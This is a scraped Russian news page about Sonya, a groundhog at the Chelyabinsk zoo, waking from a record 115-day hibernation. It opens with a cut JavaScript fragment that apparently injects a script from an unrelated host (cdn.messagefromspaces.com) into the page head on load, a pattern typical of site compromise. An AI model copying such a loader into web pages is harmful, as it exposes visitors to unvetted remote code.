, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Сурок из челябинского зоопарка вышла из рекордно долгой спячки

На этой неделе в городском зоопарке Челябинска произошло знаменательное событие - проснулся сурок по имени Соня, который находился в спячке целых 115 дней. Теперь, если приметы не врут, южноуральцев ждет теплая весна.

Дело в том, что в Америке, где этот зверек весьма распространен, бытует мнение, что если проснувшийся сурок при выходе из своей норки не отбрасывает тень, то весна будет теплой. Специалисты челябинского зоопарка специально дежурили у норки Сони и убедились, что при животное не оставило тени. Сурок сразу же начал активно изучать свою клетку, с любопытством осматривать посетителей. Сегодня в гости к Соне пришли школьники. Ребята принесли зверку угощение и плакаты с поздравлениями.

Отметим, что сурок живет в челябинском зоопарке два года - это подарок от жителей города. Пока у Сони нет кавалера, но в настоящие момент сотрудники зоопарка подыскивают для нее подходящую пару.

Новости
0 rating, 0 votes0 rating, 0 votes Запрещено!
Loading...Loading...
21:13 - 02 апреля 2014
|
автор: U-RSS
|
(520)
|
(0)

Комментарии (0)

Я человек
Я бот